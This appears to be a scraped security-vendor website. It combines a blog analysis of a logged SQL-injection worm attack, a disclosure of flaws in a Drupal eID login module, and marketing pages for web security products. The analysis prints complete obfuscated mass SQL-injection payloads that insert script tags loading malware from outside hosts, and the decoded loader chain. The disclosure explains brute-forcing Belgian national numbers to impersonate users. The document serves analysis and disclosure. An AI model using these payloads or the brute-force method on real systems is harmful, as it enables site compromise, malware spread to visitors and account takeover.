Most of you probably know about the Asprox worm? See http://matchent.com/wpress/?q=node/419

This weekend a bot attacked this blog, protected by ZION SECURED WAMAF:

GET /blog/2010/2/26//solutions.aspx?show=Solutions';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20
cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%
20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.
xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20f
EtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0
)%20bEgIn%20exec('UpDaTe20%5B'%2B@t%2B'5D%20sEt20%5B'%2B@c%2B'%5D=rtrim(c
onvert(varchar(8000),%5B'%2B@c%2B'%5D))%2BcAsT(0x3C736372697074207372633D
687474703A2F2F7777772E646E663636362E6E65742F752E6A733E3C2F7363726970743E%
20aS%20vArChAr(53))%20where%20%5B'%2B@c%2B'5D%20not%20like%20''%dnf666%''')%20fEtCh%20next%20FrOm%20
tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20t
AbLe_cursoR;-- HTTP/1.1
User-Agent: curl/7.19.7 (i386-pc-win32) libcurl/7.19.7
Host: www.zionsecurity.com
Accept: */*

The User Agent indicates that this is not a browser but the well-known tool curl,  running on Windows. This request wants to test if there is data in the database containing the string dnf666. Probably to see if the database is already infected with the malicious payload.

Because we don't reply with HTTP 500 error but redirect to the homepage instead, the worm attempts to inject its payload with the following GET request:

GET /blog/2010/2/26//solutions/code-review.aspx?show=Code+review';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR
%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,
sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20
(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20
b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_
cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20%5B'%2B@t%2B'%5D%20sEt%20%5B'%2B@c%2B'%5D=rtrim(convert(varchar(8000),%5B'%2B@c%2B'%5D))%2B
cAsT(0x3C736372697074207372633D687474703A2F2F7777772E646E663636362E6
E65742F752E6A733E3C2F7363726970743E%20aS%20vArChAr(53))%20where%20%5B'%2B@c%2B'%5D%20not%20like%20''%dnf666%''')%20fEtCh%20next%20FrOm%20tAbLe_
cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20
tAbLe_cursoR;-- HTTP/1.1
User-Agent: curl/7.19.7 (i386-pc-win32) libcurl/7.19.7
Host: www.zionsecurity.com
Accept: */*

Comparing this with the original payload that you can find here shows that the attack above is from a different worm then Asprox, http://chaptersinwebsecurity.blogspot.com/2008/07/asprox-silent-defacement.html:

DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524520405420766172636
8617228323535292C40432076617263686172283430303029204445434C41524520546162
6C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622
E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220
776865726520612E69643D622E696420616E6420612E78747970653D27752720616E64202
8622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D
323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F7
2204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F20
40542C4043205748494C4528404046455443485F5354415455533D302920424547494E206
57865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727
223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646
F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27
272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B65202727252
23E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F
7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272
727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F
2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F4
3415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);--

First of all:

The worm uses a mix of small and big caps, for example "dEcLaRe" or "fEtCh next FrOm tAbLe". This is to bypass web application firewalls or filters that trigger on DECLARE, FETCH NEXT FROM TABLE, .. so this is interesting.

The same way to inject the malicious payload is used with CAST:

3C736372697074207372633D687474703A2F2F7777772E646E663636362E6E65742F752
E6A733E3C2F7363726970743E

This can be ASCII HEX decoded using Burp Decoder, resulting in <script src=http://www.dnf666.net/u.js></script>.

Loading this script (dangerous!) returns:

try{__m}catch(e){__m=1;document.title=document.title.replace(/\<(\w|\W)*\>/,"");document.write("<iframe src=http://www.dnf666.net/cnzz.html width=0 height=0></iframe>");}

this returns:

<div style=display:none><script src="http://s10.cnzz.com/stat.php?id=1990191&web_id=1990191" language="JavaScript"></script></div>

Google has not listed this cnzz.com domain as malicious, but it was malicious in the past:

Safe Browsing
Diagnostic page for cnzz.com

What is the current listing status for cnzz.com?

This site is not currently listed as suspicious.

What happened when Google visited this site?

Of the 132 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-03-07, and the last time suspicious content was found on this site was on 2010-03-07.

Malicious software includes 224 scripting exploit(s), 22 exploit(s), 5 trojan(s).

Malicious software is hosted on 1 domain(s), including cmzz.3322.org/.

This site was hosted on 9 network(s) including AS17672 (CHINATELECOM), AS4847 (CNIX), AS4808 (CHINA169).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, cnzz.com did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 89 domain(s), including 360quan.com/, xsdyy.com/, phototh.com/.

Visiting this URL is blocked by ScanSafe:

So it's basically the same like Asprox, injecting a script tag to a malicious file.

Googling for the string dnf666.net/u.js already reveals some victims, including some high profile sites!

Be careful when browsing!

About Armorlogic

Armorlogic is focused exclusively on web application and website security and was founded in 2004 by leading Internet security specialists from some of the world's largest Internet security consulting companies.

Armorlogic's goal is to provide a cost effective way to proactively protect web sites, web applications, and their users from attack in a way that network firewalls and intrusion detection systems can not.

Easy to install, maintain and use, Profense is used by thousands of businesses, governments and organizations all over the world to protect Internet facing applications, servers and data. To maximize protection and minimize maintenance and adjustment, Armorlogic believes that the positive security model should be the governing principle of IT security solutions.

ZION SECURITY uses the technology of Profense for ZION SECURED WAMAF, a Web Application Firewall as-a-Service. However, we can also install, configure and monitor the technology of Profense in your datacenter.

Web Application Firewall

A Web Application Firewall (WAF) is a layer 7 Firewall (often called proxy firewalls). Because it acts on the application layer, it may inspect the contents of the traffic, blocking specified content, such as certain websites, viruses and attempts to exploit known logical flaws in client software.

ZION SECURITY offers as well commercial Web Application Firewall solutions like F5 and Profense, as open source solutions like Modsecurity. Our security operations team can install and configure these types of WAF's in your infrastructure.  

However the disadvantage of a WAF is that the monitoring of the WAF needs a certain level of web security expertise. This is one of the main reasons why most organizations do not have yet a WAF installed. That's why ZION SECURITY has developed a unique solution, called ZION SECURED WAMAF.

ZION SECURED WAMAF is Security-as-a-Service and completely managed and monitored by our web security experts. ZION SECURED WAMAF protects your web site(s) and web server(s) against attacks and generates detailed reports of detected attacks. More information on www.zionsecured.com.

By using a combination of a WAF with our vulnerability assessment solution ZION VERIFIED, organizations can rest assured that their web applications are secure. The website will be protected to the maximum and your developers will learn how to write secure code in the long run.

The five random numbers are not all five random. The last two are a checksum for the entire number, using a DIV 97. The first three are even numbers for male citizens, and odd numbers for female citizens.

So this means that we can brute-force a Rijksregisternumber in 500 or 499 attempts.

This is better then 9999 so using Burp Intruder with 10 threads/second should take less then a minute to find the valid RRN when we know somebody his birthdate.

ZION SECURITY wrote a whitepaper about implementing a secure authentication framework for the eID, see http://www.zionsecurity.com/news/whitepaper-10-tips-voor-een-veilige-eid-implementatie.aspx.

Because it is Drupal, the module is open-source so we took a look at the implementation and to my big surprise, the implementation fails terribly at securing the authentication process.

Testing this in our lab was impossible because the quality of the module is unsatisfying and I don't want to waste time fixing somebody else mistakes. However, it was for me required to blog about the unsecurity of this module before somebody uses it for a production environment. Contacting this web agency resulted in nothing constructive so this is also an eye-opener for them!

What is the problem? There are different problems.

1. They use the serialnumber of the certificate, which is the Rijksregisternummer (SSN) of a Belgian citizen. The usage of this SSN is prohibited by the Belgian Privacy Commission but they use it as a primary key in the Drupal user database (fail!)

2. To authenticate the user, they use a proxy server that will validate the eID certificate and retrieve the values like firstname, lastname and serialnumber. These parameters are then sent to the Drupal site using HTTP in clear text! No protection of the SSN is provided in any way, for example: http//drupalsite/eid/response?firstname=Erwin+Andr%C3%A9&lastname=Geirnaert&serialnr=CENSORED &token=0f2e01a6bedb2dee2df2bde2c05f68c8

3. The token that you notice in the URL above is generated by the Drupal site! This token is visible for the user and can be copied and re-used, in my Drupal site this was /eid.php?token=0f2e01a6bedb2dee2df2bde2c05f68c8&login=CENSORED

4. To make things worse, if we combine the previous information we can logon to any web site that uses this module when we know the SSN number. We don't need the eID, the PIN code or the certificate, only the SSN. How do you get the SSN? The SSN is a string of 11 numbers, where the first 6 are the birthdate of the user and the last 5 are random. So if I know somebody his birthday (LinkedIn, Plaxo, Facebook anyone?) I can brute-force his SSN in 9999 requests to gain access to the Drupal site. These attempts are not detected, blocked or logged!

5. All connections to the Drupal web site are not using HTTPS so it is possible to sniff the user his cookie! Now that is possible to use SSL with client certificates thanks to the Belgian government, unbelievable!

Typing this makes me somewhat angry. Initiatives like OWASP, SANS Secure Coding, ... are useless when people don't want to write secure code and forget about the impact of security bugs and even refuse help from people like us!

 Malware Monitoring

Our Web Anti-Malware (WAM) Malware Monitoring periodically scans your website for malware infections. If we detect that your website has been infected, you will receive an immediate alert with diagnostic information to remove the infection.

Armed with the diagnostic information, the customer (or its web hosting provider) can remove the malicious code, in many cases before the site would get blacklisted.

As a result, the site can continue to operate as normal and avoid getting blacklisted, even after suffering a malware attack. We continue to monitor the site and send alerts if malware activity is detected in the future.

For example Javascript viruses will be immediately detected and escalated to the customer to prevent that visitors of the customer's web site are infected.

Your Key Benefits:

• Avoid getting blacklisted (and avoid revenue and brand losses) with regular scans of your site
• Instant alerts of malware activity on your site (most often before blacklisting occurs)
• Actionable information to resolve the malware problem quickly and avoid getting blacklisted
• Detailed weekly malware scanning reports

Sign up for the Web Anti-Malware Monitoring now by entering your domain name.

Download the PDF for more general information.

Download the PDF about how malware attacks occur.

Download the PDF about malware hurts web business.

 Blacklist Monitoring

If a site has been infected with malware, there is a good chance the site will get blacklisted by Google, Firefox, Internet Explorer, and/or the desktop anti-virus companies. If this happens, the website will suffer losses of traffic, revenue and brand.

Often, sites first discover that they have been blacklisted when a customer notifies them of the blacklisting. We provide an alert service to help websites react quickly if their site has been blacklisted.

The Web Anti-Malware (WAM) Blacklist Monitoring frequently checks your website against a variety of blacklists. If the website appears on a blacklist, you receive an instant alert. You can subsequently return to our experts and diagnose any problems with the blacklisted site.

Your Key Benefits:

• Minimize losses by reacting quickly if your website is blacklisted
• Checks your website regularly against a variety of important blacklists including Google, Firefox, Chrome, and others
• Get an instant alert if your site is blacklisted
• Weekly blacklist report

Sign up for the Web Anti-Malware Blacklist Monitoring FOR FREE by entering your domain name.

Download the PDF for more general information.

Download the PDF about how malware attacks occur.

Download the PDF about malware hurts web business.

About Scansafe

Scansafe is the pioneer and largest global provider of SaaS Web Security, ensuring a safe and productive environment for businesses. Scansafe solutions keep malware off corporate networks and allow businesses to control and secure the use of the Web.

Scansafe processes billions of Web requests and millions of blocks each month for customers in over 100 countries.

ZION SECURITY makes use of Scansafe to protect each individual user against external threats.

Scansafe Web Filtering enables businesses to implement granular control for both inbound and outbound communications. For example integrated outbound policy helps prevent leaks of confidential or personal data to the Web. Scansafe Web Filtering protects your network and staff from undesirable Web content, drives productivity, optimizes network resources by reducing bandwidth congestion and provides comprehensive reporting.

Scansafe Web Security analyzes every Web request to determine if content is malicious, inappropriate or acceptable based on the defined security policy. This offers effective protection against threats including zero-day threats that would otherwise be succesful.

Scansafe Anywhere+ protects remote workers to the same level, whether they are working from home, from a hotel or even from a coffee shop. Anywhere+ automatically redirects users to the closest datacenter, ensuring that performance is always optimized.

For more information click here or visit www.scansafe.com.

Web Malware Scanning

Web browsing has become the favorite target of malicious code writers seeking to compromise your network. The number of browser vulnerabilities continues to rise, fuelling zero-hour exploits which can infect systems before patches or signatures are available.

The threat is moving from the inbox to the browser with increasing focus on gaining financial advantage. This is most evident in the recent rise of spyware which comes in a wide variety of forms, from programs that steal confidential information to nuisance adware.

By the time most administrators realize they have a problem, the damage is already done, and they are left with the high cost of remediation, lost productivity, and unnecessary network traffic and system instabilities.

Increasing browser vulnerabilities, zero-hour threats, and the insertion of malicious code on legitimate sites have made real-time malware scanning essential (simply filtering by URL leaves a large security gap).

Scansafe's Web Malware Scanning service eliminates all types of harmful Web malware, including spyware, viruses and zero-hour threats before they can enter and infect your network.

This service delivers true layered defense through a combination of multiple best-in-class signature scan engines, multiple reputation and behavior analysis engines, automated machine-learning heuristics, and the industry's largest Web data set.

All Web requests are scanned in real-time, rather than solely relying on static URL lists, providing you with dynamic, real-time, and multi-layered protection.

Anti-malware scan engines will protect your network from threats that have been previously identified and documented. But what if your network is one of the first to be attacked?

Signature-based scanning alone will not provide the protection you need. Scansafe has developed Outbreak Intelligence, a proprietary security platform which analyzes URL reputation, traffic behaviour, code behaviour and code reputation in addition to signatures to detect unknown as well as known malware. Once it has detected unknown malware, Outbreak Intelligence automatically propagates the protection to the scanning layer, where the threat is neutralized before it can reach your network.

Download the PDF about ScanSafe Web Malware scanning for more information.

Please consult one of our representatives for more information or a quote.

Anywhere+

The number of employees who work outside the traditional office is rapidly increasing and perhaps surprisingly now constitutes the majority for many businesses.

Roaming employees now connect to the Internet from a variety of locations, from their homes and client offices to airport lounges and hotel hotspots. However, the benefits of employees working outside the office are tempered by some obvious problems, chief of which are lower levels of security and increased vulnerability to Web malware.

IT administrators have little or no control over roaming employees' access to inappropriate Web content. This situation is not helped by the fact that roaming employees are five times more likely to access inappropriate content on the road than in the office.

Even more worrying is that roaming employees only use VPNs 17% of their browsing time. How are they controlled and protected the other 83% of the time?

Anywhere+ is ScanSafe's SaaS Web Security for real-time protection and policy enforcement for your roaming employees. With Anywhere+ it is finally possible to protect your roaming employees wherever they are working.

Unlike traditional approaches which rely on software and appliances, Anywhere+ is delivered as a service for complete security, reduced complexity and simplified user management. Anywhere+ removes the performance issues and bandwidth congestion associated with backhauling Web traffic over the corporate VPN, so your security perimeter is now anywhere you want it to be.

All Web traffic flowing to ScanSafe's upstream datacenters is SSL encrypted leading to improved security over public networks. With Anywhere+, log information is securely in your hands, not on a file on the local PC. Reporting data is automatically and continuously aggregated across internal corporate users and roaming users.

Policy changes can be implemented immediately - no need to wait for client software to try to update itself on its own schedule. Policy changes are active within seconds, globally.

Anywhere+ is deployed through a lightweight driver (7MB) that requires minimal memory (less than 16MB RAM) to authenticate and direct your external client Web traffic to ScanSafe's scanning infrastructure.

Download the PDF about ScanSafe Anywhere+ for more information.

Please consult one of our representatives for more information or a quote.

Scansafe Web Filtering

As the amount of time spent browsing the Internet continues to rise, the problems associated with providing unmonitored and unregulated Internet access also increase.

Now dynamic and user generated content makes up a large percentage of content being accessed. Therefore traditional methods of filtering based purely on web site categorization can no longer be considered sufficient to maintain web usage policy and prevent inappropriate content from entering the network.

Scansafe Web Filtering empowers organisations of all sizes to implement an effective Web policy to help limit legal liability, enhance user productivity and improve network performance by preventing inappropriate, bandwidth intensive or non-business related content from entering the network.

Scansafe Web Filtering enables businesses to implement granular control for both inbound and outbound communications while realizing cost savings of up to 40% by eliminating the need to purchase, deploy and maintain hardware required for on-premise solutions.

With this solution you have complete control over how end users access content on the Internet by providing intuitive tools to create, enforce and monitor effective inbound and outbound web policy. For example it helps you to prevent leaks of confidential or personal data to the Web.

Scansafe Web Filtering integrates seamlessly with existing Active Directory infrastructure, allowing administrators to easily create different access policies to suit different areas of the organization. You also have a web-based interface for centralized management and reporting.

Download the PDF about ScanSafe Web Filtering for more information.

Please consult one of our representatives for more information or a quote.

Web Security

ZION SECURITY cooperates with Scansafe to protect your users against web based threats.

ScanSafe is the pioneer and largest global provider of SaaS (Software as a Service) Web Security, ensuring a safe and productive Internet environment for businesses.

ScanSafe solutions keep malware off corporate networks and allow businesses to control and secure the use of the Web. As a SaaS solution, ScanSafe eliminates the burden of purchasing and maintaining infrastructure in-house, significantly lowering the total cost of ownership.

Powered by its proactive, multilayered Outbreak Intelligence^TM threat detection technology, ScanSafe processes billions of Web requests and millions of blocks each month for customers in over 100 countries.

Discover now the different possibilites and solutions like Web Filtering, Web Malware scanning and Anywhere+ (which protects your remote workers).

 Web Anti-Malware

Planting malware is evaluating into a growing and concerning problem. Over the last two years there was a 600% increase in web based attacks. Hackers target legitimate web sites to plant malware. At this moment more than 1 million pages are infected per month. Several reports claim that planting malware on target web sites was already the number one security attack for online criminals last year (2008).  

Web malware infections can have a serious impact on business revenue. Google, Firefox, Internet Explorer and anti-virus companies blacklist infected websites. On top of that, your website suffers damage concerning brand and reputation by infecting visitors.

Our Web Anti-Malware (WAM) solution, part of ZION VERIFIED, consists of two services: Blacklist monitoring and Malware monitoring.

  ZION VERIFIED

What are organizations doing at this moment to protect their critical web applications?

Organizations rely on a third party to execute penetration tests. This is a manual test performed by security experts. The penetration test detects all kind of leaks and vulnerabilities in the application or infrastructure. The third party delivers a list with vulnerabilities that have to be solved by the organization itself.

Unfortunately, at this point the penetration test stops and in most cases the list of vulnerabilities will not be followed up by the third party...

Over the last couple years we investigated that practically every (medium or large) organization has difficulties to solve the vulnerabilities and leaks the penetration test had detected.

However website security is more than just detecting vulnerabilities and leaks. It's about scanning, detecting, fixing and retesting the vulnerabilities in your website. It's a never ending security lifecycle that has to be monitored 24/24, 7/7.

Discover here how ZION VERIFIED helps organizations to manage their web security risks.

Security testing

The ideal situation for the customer and ZION SECURITY is that security tests are executed during the development phase, together with functional testing and stress testing.

The main purpose of security testing is to identify the existence of security controls like authentication, authorization and input validation.

For example the risks for authentication and authorization include access to the system by an unauthorized user, theft of usernames or passwords and password cracking/dictionary attacks, and ability to bypass authentication or authentication logging.

All attacks and tests are executed manually. ZION SECURITY only uses automated tools for specific functions like brute-forcing ports, passwords, identifiers,...

Security tests are mostly focused on one single application and our security experts follow a certain methodology:

1. Our security experts test and scan the application for vulnerabilities and leaks
2. We insert reports and bugs in the customer's bugtracking system
3. Our security experts retest the application
4. Final report that will be discussed at length with the responsible person regarding these matters in the company

In a first meeting, the methodology will be discussed and can be adapted on customer demand.

Files

ZION SECURITY Services - Security Testing.pdf

 Interested?

Ask here for more information or an offer without obligation.

Quick Scan

ZION SECURITY developed on customer demand a specific solution called Quick Scan.

When choosing a penetration test, the customer has the possibility to test and scan the entire infrastructure and applications for leaks and vulnerabilities.

The difference between a penetration test and Quick Scan is that a Quick Scan is a lighter version of the penetration test. Here the scope and time are limited. The customer indicates in a first meeting which application or infrastructure has to be tested for vulnerabilities and leaks.

Upon completion of the Quick Scan the customer will receive a final report containing a list of vulnerabilities and leaks. The report also contains a plan of operation indicating the priority, possible cost and the time of implementation.

This report can be discussed with the responsible person regarding these matters in the company.

Our Quick Scan is ideal for organisations that want to have a global idea about the security level of their infrastructure and applications.

A Quick Scan can also be customized, for example an extensive scan of one specific application.

   Interested?

Ask here for more information or an offer without obligation.

Code review

ZION SECURITY is expert in executing code reviews, manually or automated. A code review is required when the objective is to find all vulnerabilities and backdoors in a (web) application. Often we complement code review with security testing to verify the exploitability of the identified vulnerability.

Code review also allows to give in depth countermeasures to secure the application and to train developers to prevent future holes.

During most code reviews we have identified security issues in the business logic of the application, which would not have been found using a penetration test approach.

Files

ZION SECURITY Services - Code Review.pdf

Want to know more?

For more information or a specific quote adapted to your situation, please feel free to contact one of our representatives.

 WhiteHat

ZION VERIFIED is a unique service consisting of a combination of software (WhiteHat Sentinel) and manual testing. ZION SECURITY is the first enterprise in Europe that has the right to use this software.

WhiteHat Security is a leading American provider of website security services. It was founded in August 2001 by a team led by Jeremiah Grossman, a security industry veteran and former Yahoo! information security officer. Jeremiah founded the company to provide a comprehensive solution to the growing problem of website security.

WhiteHat Sentinel is the most accurate, complete and cost-effective website vulnerability management solution available on the market. WhiteHat Sentinel is built on a Software-as-a-Service (SaaS) platform designed from the ground up to scale massively, support the largest enterprises and offer the most compelling business efficiencies, lowering your overall cost of ownership.

This software has been especially developed to test and scan (custom) web applications, what makes it unique in the market.

As you might know, there are currently 24 broad classes of attacks. And, since every web application is unique, we're dealing with known classes of vulnerabilities in completely unknown code. The challenge is to figure out in each unique website, exactly where and how these vulnerabilities are implemented in the code. That's where WhiteHat Sentinel differentiates from other products.

Most of medium and large organizations in America, with critical web applications, are already using WhiteHat.

 ZION VERIFIED: Different modules

We developed, on customer demand, different modules:

ZION VERIFIED Light allows you to scan and retest your applications solely using the automatic software of WhiteHat.

ZION VERIFIED Business allows you to scan and retest your applications with WhiteHat in combination with manual tests performed by our security experts

ZION VERIFIED PCI: The difference with ZION VERIFIED Business is that we add an "introduction to web application security" training to satisfy PCI compliancy and we can generate a PCI report.

The course provides an overview of the fundamental principles of website security and meets PCI-DSS requirement 6.5b which covers developer training on secure coding techniques. All participants will receive a certificate confirming course completion.

The ZION VERIFIED PCI report delivers both an overview and an in-depth look into the PCI compliance of each website under management. For each vulnerability class, the report details how the vulnerability is exploited, gives protection advice and lists links to reference information. Open vulnerabilities of each class on the customer's website are also listed.

Contact one of our experts for more information or a quote without obligation.

 What is ZION VERIFIED?

ZION VERIFIED closes the gap between detecting, fixing and retesting vulnerabilities in your web applications. 

ZION VERIFIED scans your web applications at regular intervals. We find your vulnerabilities, propose a solution to your development team and prove that they were resolved by verifying the solution.

Our service consists of a combination of software and manual tests. The software comes from WhiteHat, an American web application security company. This software has been especially developed to test and scan (custom) web applications, what makes it unique in the market.

Aside from using the software to test your applications, our security experts also perform manual tests on your critical applications.

FOR A FIXED AMOUNT EACH YEAR!

ZION VERIFIED handles your web applications vulnerability management for you. However, it also puts you in the driver's seat of multitude tasks that put you in charge.

 You can:

• Request to schedule a new scan for an application.
• Request a manual retest of a vulnerability that you already addressed.
• Send a general support question about software security to ZION SECURITY.
• Receive vulnerability reports in HTML format. As ZION VERIFIED identifies vulnerabilities, it classifies them according to the 24 Web Application Security Consortium (WASC) vulnerability classes and the OWASP Top 10.
• ... 

ZION VERIFIED scans for business logic flaws and vulnerabilities. It tests for example the OWASP Top 10 and the WASC 24 classes. The OWASP Top Ten represents a broad consensus about what the most critical web application security flaws are. ZION VERIFIED is always up to date with the newest vulnerabilities.

ZION SECURITY is the first European company that can offer this new and innovative service toward his customers!

Tufin: How to get it?

For a live demo or a quote, please feel free to contact one of our representatives.

Our security experts can give a demonstration of Tufin at your office. This will take approximately one hour.

Some screenshots

Click on the pictures for a more detailed view.

Screenshot 1: Object comparison

Screenshot 2: Rule and Object usage analysis

Screenshot 3: Firewall rule change report

Screenshot 4: Firewall OS Monitoring

Screenshot 5: Business ownership change report

Tufin: your benefits

Your key benefits using Tufin SecureTrack are:

• Tufin monitors firewall policy changes, reports them in real-time and maintains a comprehensive, accurate audit trail for full accountability.


• Analysis and clean-up of complex rule bases and objects. Tufin for example locates unused rules so that they can be removed, thereby eliminating potential security holes and improve performance. It also enables administrators to organize the rule base according to priority to improve performance and to reduce the need for additional hardware.


• Powerful simulation and risk analysis to identify potential security risks, ensure compliance with organizational security standards, and prevent service interruptions.


• Comprehensive monitoring of critical firewall operating system components and server performance indicators to prevent service interruptions and enable effective auditing.


• Best practice audit: Tufin compares current security policy to the industry's best practices to identify potential errors or areas for improvement.


• Integration with change management, ticketing systems.


• Intuitive, graphical views of firewall policies, rule bases and configuration changes for Check Point, Cisco, Juniper, Fortinet, F5 and Bluecoat firewalls.

What is Tufin?

Tufin SecureTrack is the leading Firewall Operations Management Solution.  

It's capable of gathering detailed information from a very large number of firewalls and its real time policy monitoring and analysis capabilities make it an ideal partner for change management teams.

Tufin SecureTrack is the most comprehensive solution available for managing and auditing firewalls. With support for all major firewall vendors (Checkpoint, Cisco, Juniper, BlueCoat, F5, Fortinet), SecureTrack provides a cohesive, unified view of all of firewalls - along with many other security devices - on the network.

SecureTrack is essential to ensuring that a corporate security policy is being implemented consistently in an environment with multiple rule bases, geographies, and teams.

With Tufin SecureTrack, you will increase productivity of the whole organization by better understanding how to manage and audit your firewalls.  

Splunk: How to get it?

For a live demo or a quote, please feel free to contact one of our representatives. Our security experts can setup a demo at your office. This will take no longer than 30 minutes.

You can also download a free, limited edition of Splunk. Just click here.

Splunk: References

More than 350.000 people worldwide already are using Splunk, including over 1.000 licensed customers. Some examples are Cisco, Dow Jones, LinkedIn, Motorola, MySpace, NASA, T-Mobile, Verisign, Verizon, Visa and Vodafone.

All customers testify that they are improving operations, investigating security incidents in record time and meeting compliance requirements at lower cost, using Splunk.

Splunk: Your benefit

Your whole IT team will be smarter as they share saved searches, tag events, hosts and configurations with useful information and build their own dashboards with interactive charts, graphs, tables and more.

By making it possible for humans to interact with terabytes of IT data, Splunk is fundamentally changing how organizations manage, secure and audit increasingly complex computing environments.

Splunk: Enables to secure your IT infrastructure

Splunk gives you the opportunity to investigate security incidents in record time by searching and analyzing all your security-relevant data from one place.

It helps security analysts to investigate incidents in minutes instead of hours or days by searching and analyzing all security relevant data from one place - catching attackers and malicious insiders who had previously gone undetected.

Splunk improves your security posture by quickly filtering out false positives and visualize security information for situational awareness.

The figure below indicates how Splunk enables you to secure your IT infrastructure.

1. Index all the data you need to monitor and investigate any type of threat - OS, IDS, firewall, network device, DNS, DHCP, remote access and AAA logs, proxy, web, custom application logs and more.


2. Security analysts and incident response teams will initially adopt Splunk to investigate IDS and SIEM alerts, investigate activity for flagged users and investigate access to sensitive data.


3. As they go, they'll enrich the raw data by tagging events they encounter as significant; normalizing heterogeneous data formats on-the-fly by extracting and naming fields, such as usernames, and identifying and naming events, such as successful logins.


4. Automatically monitor for known bad events, and use sophisticated correlation via search, to find known risk patterns such brute force attacks, data leakage and even application-level fraud.


5. Security managers will take advantage of Splunk's reporting to get a birds-eye view of security-relevant events such as firewall reporting, IDS rule violations and login activity. Use Splunk proactively to search for attack footprints in response to reports of new zero-day attacks, review trends in logins and other activity to uncover suspicious patterns and anomalies to find previously undetected attacks.

What makes Splunk so different from other solutions?

Splunk is unique because of 6 reasons:

• Splunk indexes any data, every word of every event from any IT source in real time, without using databases, expensive connectors, custom parsers or proprietary consoles. It allows you to search for any term or grouping of words whole or fractional, in a google manner.


• Splunk lets you interact with your search results immediately. Zoom in and out on a time line of your results to quickly reveal trends, spikes and anomalies. Using statistics, graphs and other practical tools you can find in no time the needle in the haystack.


• Splunk is immensely scalable. Architecturally, Splunk can maintain online data access for years if desired using nothing more than a file system (no DB).


• Splunk does not use a Database and as such is schema-less.  All data is stored in an open format (gzip) and can be signed to ensure no one has tampered with the files.


• Splunk operates across all business units as IT search is not owned by a particular business unit. Splunk is a unifying tool that provides a predictable and common view into all log data across your organization.


• Splunk is build on a platform from which the customer can freely and with ease add on their own customization. So the customer has the ability to modify, if needed.

What is Splunk?

Splunk is IT search. For that reason Splunk is often called "Google for IT".

With Splunk you can instantly figure out what is happening anywhere in your infrastructure by making use of all the data being logged within your data center.

Only Splunk enables you to search, analyze, monitor and report on data from any application, server or network device in real time to troubleshoot application outages, investigate security incidents, meet compliance requirements, and more, in minutes instead of hours or days.

Logs, configurations, messages, traps and alerts, scripts, code, metrics and more. If a machine can generate it - Splunk can eat it !!!

Now you can search across terabytes of data in seconds to find that needle in the haystack, analyze hidden trends and instantly create reports to summarize activities. Schedule searches to alert on specific conditions and automate the delivery of reports.

Products

Mollom HTTPModule

Whitepapers

• Web hacking database bi-annual report
• Whitepaper: Analysis of an unknown malicious JavaScript
• Whitepaper: 10 tips voor een veilige eID implementatie
• Whitepaper: Selecting a secure open source content management system
• Case Study: Using Splunk for web application forensics
• Whitepaper: An overview of the current situation in the web application security landscape
• ZEND & OWASP ESAPI for PHP

ZION SECURITY in the press

Erwin Geirnaert appears on a regular base with a column in IT professional:

• Crisis als dankbaar excuus" 25 februari 2009
• Staat u ook op de lijst van gehackte sites?" 2 februari 2009
• "2009: het begin van de securitycrisis?" 14 januari 2009
• "Hoeveel zijn uw kredietkaartgegevens waard?" 6 januari 2009
• "U belt toch ook 'gratis'?" 19 november 2008

ZION SECURITY in De Standaard (on page 8).

Interview with Erwin Geirnaert in Trends: "Buying on the Internet: the booby traps"

Interview with Erwin Geirnaert and Jessica Nieuwdorp in Het Nieuwsblad, De Gentenaar and Het Volk. Online version available here (in Dutch).

ZION SECURITY in Smart Business Strategies

Interview with Erwin Geirnaert in Jobat

ZION in Ondernemers

ZION SECURITY in Business ICT

ZION SECURITY in Zelfstandig Ondernemen

ZION SECURITY in De Vlaamse Ondernemer

Interview with Erwin Geirnaert in De Tijd

We are experts in IT and security

Our consultants are experts in IT and security and have years of expercience executing projects for large, medium and small enterprises. Thanks to our broad experience in IT we offer pragmatic solutions.

Founders

ZION SECURITY was founded in 2005 by Erwin Geirnaert and Jessica Nieuwdorp.

